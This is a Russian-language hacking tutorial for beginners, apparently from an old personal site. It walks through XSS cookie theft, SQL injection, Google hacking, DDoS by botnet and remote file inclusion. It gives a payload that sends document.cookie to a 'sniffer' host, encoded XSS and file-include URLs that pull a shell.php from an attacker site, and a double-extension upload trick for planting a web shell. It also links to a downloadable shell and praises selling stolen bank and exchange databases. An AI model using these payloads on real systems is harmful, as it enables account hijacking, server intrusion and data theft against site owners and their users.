Идём всё ближе к цели!
1. XSS - наверное все слышали про Cross Site Scripting ( помоему переводится как "внедрение кодав страницу" ). Что можно поднять с помошью Xss спросишь ты? Поднять можно куки (cookie - печенье).
Зачем они нужны? С помощью кукисов ты идентифицируешься на сайте, т.е. в них хранится инфа о пользователе для сайта. Куки передаются методами POST and GET. Xss бывают активные, пассивные, полуактивные, нестандартные. В этой главе мы рассмотрим только нестандартные и простые X$$!

document.images[0].src="http://адрес снифера/s.gif"+document.cookieПростые - это что-то типа этого ""(писать без кавычек)
Но не всегда присутствует эта уязвимость на сайтах. Есть ещё несколько подводных камней - это фильтрация символов,
alert(document.cookie)браузер жертвы, интелект админа! Н-р: я однажды нашёл одну xss-ky , вбиваю и
мне выплёвывают мои куки ( это было в IE 6 ), захожу в Opera 8 нифига не пашет!
Фильтрация это вообще неприятная вешь, парсеры фильтруют знаки такие как (< >,/,+,|,пробел,$,',",; иногда () ).
Вот сим-таблица -
Сим ; / ? : @ = & < > " #
Код %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Сим { } | \ ^ ~ [ ] ` % '
Код %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27

2. SQL-Injection - самый популярный вид атаки о котором все слышали. Вы спросите почему Скуль- ИНЪЕКЦИЯ.
Инъекция - это внедрение препарата во что-нибудь, также и здесь, мы внедряем запросы в базу и получаем что хотим. Об инъекциях ты можешЪ почитать в соседней статье. Но вообще БД это лакомый кусок для хакера, в конце концов их можно продать. Очень высоко ценятся банковские базы, базы онлайн обменников. Вы спросите для чего они нужны покупателям - это же элементарно, в них хранятся мэйлы, логины, пароли, адреса, аськи, телефоны, пин-коды.
Но насчёт паролей обольщаться не стоит, в большинстве случаев они зашифрованы (нет не симкой:).
3. Google Hack - это поиск уязвимостей через самый крутой поисковик в мире - GOOGLE.COM,RU,KZ:)!
Подробнее прочитай мою статью про Google Hack!
4.DDoS - наверное ты не раз мечтал положить сайт неприятеля Васи Пупкина, чтобы тот очнулся только через дней пять.
ДДоС - это отправка пакетов на сайт ( то есть флужения ). Для организации ДДоС-а у тебя должна быть своя бот-сеть.
Бот-сеть образуется из компов захваченных тобою и находящихся под твоим надзором - своеобразные зомби.
Без бот сети, у тебя вряд ли что получится.
5. Include - способ хороший, но не всегда прёт. Способ банально прост, благоаря ошбкам програмиста у тебя появляется шанс
залить свой файл на сервант (сервер).
Вот некоторые примеры - http://la-la.fuck/index.pl?file= "http://your_site/shell.php,txt,pl"(ага)
la-la.ru/lox.pl?open="/index.html,pl,php"
Хитрости: например хитрые администраторы ставят редиректы ( перенаправление на другую страницу )
Н-р: http://site1/link.php?u=la-la.ru - вот редирект
С помощью этого бага можно провернуть и Xss и Include.
Н-р: http://site1/link.php?u=%0A%0A%3Cscri
pt%3Ealert(document.cookie)%3C
http://site1/link.php?u=http://la-la.ru/shell - без указания расширения, а то парсер запалит.

Ещё есть такой прикол как обход фильтра по расширению. Бывает что на сервер позволяют залить некий файл, картинку, без разницы, но с особым разрешением GIF,JPG и т.д. Бывает, что фильтрации вообще нет:). А если есть? Тогда методы наши будут хитрее. Мы сменим разрешение так "myfile.jpg.php", хотя я сомневаюсь, что данный метод будет работать, потому-что парсеры стали намного умнее. Ты конечно понял, что никаких картинок мы качать не будем, а зальём полноценный веб шелл или ещё какую-нибудь штучку. Шелл лучше брать от ныне закрывшейся или переехавшей ныне команды RST. По крайней мере rst.void.ru больше нету, а жалко, клёвая была группа, а какие эксплойты, загляденье. Но взять очень клёвый шелл можно по адресу с моего сайта scooterstar.narod.ru/shell.txt (расширение txt можно убрать:). Там кроме этого ничего нет, не бойся это не вирус, а если антивирус будет на него ругаться не бойся, вирусов с расширением txt я ещё не видел. Кстати, ты спросишь как шелл запустится на сервере? Отвечаю:" Он написан на языке перл, перл - это интерпритатор ( так вроде:), эксплойт запустится сам, только укажи путь к интерпритатору, н-р: !usr/bin/perl, в Выне адрес и perl.exe.